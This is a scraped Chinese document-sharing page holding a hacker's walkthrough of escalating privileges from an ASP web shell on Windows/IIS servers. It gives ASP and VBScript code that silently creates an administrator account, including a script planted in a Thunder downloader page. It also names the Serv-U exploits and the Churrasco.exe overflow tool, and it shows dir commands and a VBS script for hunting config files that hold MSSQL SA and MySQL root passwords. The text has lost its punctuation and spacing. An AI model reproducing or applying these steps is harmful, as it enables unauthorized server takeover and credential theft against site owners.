关闭

关闭

关闭

封号提示

内容

首页 ASP_SHELL提权流程详解.doc

ASP_SHELL提权流程详解.doc

ASP_SHELL提权流程详解.doc

上传者: cherry__84 2011-06-14 评分 0 0 0 0 0 0 暂无简介 简介 举报

简介:本文档为《ASP_SHELL提权流程详解doc》,可适用于IT/计算机领域,主题内容包含拿到webshell确定了是什么权限的那么提权就可以开始了。首先是最简单的system权限下直接添加账号和普通的CMD命令没有什么区别。这种机会还是符等。

拿到webshell确定了是什么权限的那么提权就可以开始了。首先是最简单的system权限下直接添加账号和普通的CMD命令没有什么区别。这种机会还是很少的基本我就遇到过次。          此处提权失败进入还有一个特别的用asp代码来提权不过几率更小在提权刚开始可以试一试。也不知道在什么环境下的代码如下这个也是网上找到的<SetonlineServer=GetObject("WinNT:")Setnewuser=onlineServerCreate("user","enterer")NewUserSetPassword""NewUserFullName="enterertest"NewUserDescription="enterer'sexample"NewUserSetinfoSetoDomain=GetObject("WinNT:""")SetoGroup=oDomainGetObject("Group","administrators")oGroupAdd("winnt:enterer")ResponseWrite"用户enterer添加成功"ResponseWrite("<BR>")ResponseWrite"用户enterer已经被添加到管理员组"SetoDomain=NothingSetoGroup=Nothing>Enterer是账号是密码下意识的使用shell自带的提权功能全部都测试一遍。ServUpcAnywhereRadmin密码读取等可能会成功的哦我第一次就是用了SU提权成功的当时连提权的原理都不知道。              此处提权失败进入然后观察shell上的信息如果在查询管理了出现什么xxx$的账号那么很有可能服务器就已经被其他的黑客提权成功了。测试服务器是否支持phpaspx这个两个shell的权限都比asp的大。(提权的方法都差不多但是权限愈大机会愈大)支持的话最好用aspx的shell来提权aspx的权限等同于user。查看服务器安装了什么软件杀毒软件安装的话提取可能会失败(貌似麦咖啡有防溢出)迅雷和搜狗最新也爆出提权的方法安装了mssql或者mysql可以用数据库提权su的话最好了有修改权限的话就可以直接加个ftp的system权限进去提权FlashFXP的话下载SitesdatquickdatStatsdat用软件破解密码或者直接覆盖本地的然后直接连接用以扩大战果Gen据说也能提权不过没试过MagicWinmail大概也可以提权不过我也没有试过。不过很多课程都介绍反弹NC提权替换系统服务提权写入启动项提权perl提权。反正我是没成功过NC由于我是内网就没试过不过反弹的话能把guest的shell反弹个system权限过来吗估计也是不可能。替换系统服务没试过不知道怎么找我也没耐心况且shell有往windowssystem里写入的权限还不得而知。启动项一样的有次我用su往启动项里echo写加管理员的代码都没有成功。Perl提权这个也太RP了吧貌似必须是要启用什么GUI我也是一次没试过。然后来端口扫描看看开了什么端口远程桌面mssqlmysqlSU等等看到就偷笑吧提权进入用ftp域名来确认使用的是什么ftp软件一般来说安装了ServU的服务器就有很大的机会提权。版本越低成功率越高。如果是su版本在以下即使改了默认的密码SUX,X都有提权脚本SUX最近又爆出提权的漏洞了。一般来说SU提权成功占提权成功的以上。具体的可以看我的文章《一次su提权的失败》虽然失败了但是详细介绍了SU提权的各种方法。          此处提权失败进入利用巴西烤肉提权。估计很多人都不知道巴西烤肉是什么东西就是Churrascoexe这个文件网上一搜有很多下载。这个是利用系统的漏洞进行溢出提权基本提权成功以上。如果使用这个提权没有回显或者反应很慢就基本表示提权失败了。提权的方法是在CMD命令一行里输入C:recyclerexe空格“CMD命令”exe就是巴西烤肉成功率也和RP有关。        此处提权失败后提权的机会就比较小了。此处提权失败进入查找connaspwebconfigasp等文件查找mssql的SA密码和查找incphp等文件查找mysql的root密码这两种方法都有提权的机会。查找的方法在《第一次mssql提权里有介绍》那个是利用aspx的一个功能来实现的。现在来介绍两个在asp环境下的查找方法。第一个是利用CMD命令dirsd:connasp或者dirsd:*inc*php来查找配置文件。这个CMD命令就等于搜索的意思搜索d盘下的全部connasp文件。或者你知道网站用的CMS可以搜索这个CMS名称加上数据库配置文件位置。当然文件比较多的话回显就比较慢第二个是利用一个VBS来查询服务器里全部网站的路径用这个方法也可以找到配置文件VBS代码这个是有次入侵服务器得到的貌似部分可以用可以显示网站的路径。SetObjService=GetObject("IIS:LocalHostWSVC")ForEachobjwInobjserviceIfIsNumeric(objwName)ThensServerName=ObjwServerCommentSetwebSite=GetObject("IIS:LocalhostWSVC"objwName"Root")ListAllWeb=ListAllWebobjwNameString(Len(objwName),"")objwServerComment"("webSitePath")"vbCrLfEndIfNextWScriptEchoListAllWebSetObjService=NothingWScriptQuit基本提权就这些流程了还可以用软件的漏洞来提权例如搜狗是替换掉PinyinUpexe来提权。迅雷是在安装目录下的geturlhtmgetAllurlhtm里面加入代码进行提权其实也很渺茫。<scriptlanguage="VBScript">Setvbs=CreateObject("WscriptShell")vbsrun"cmdcnetuser用户名密码add",vbsrun"cmdcnetlocalgroupadministrators用户名add",<script>社工的提权还没用过太XE了就不介绍了。

职业精品

用户评论

0/200
    暂无评论

精彩专题

上传我的资料

热门资料

资料评价:

/3
1下载券 下载 加入VIP, 送下载券

意见
反馈

返回
顶部

Q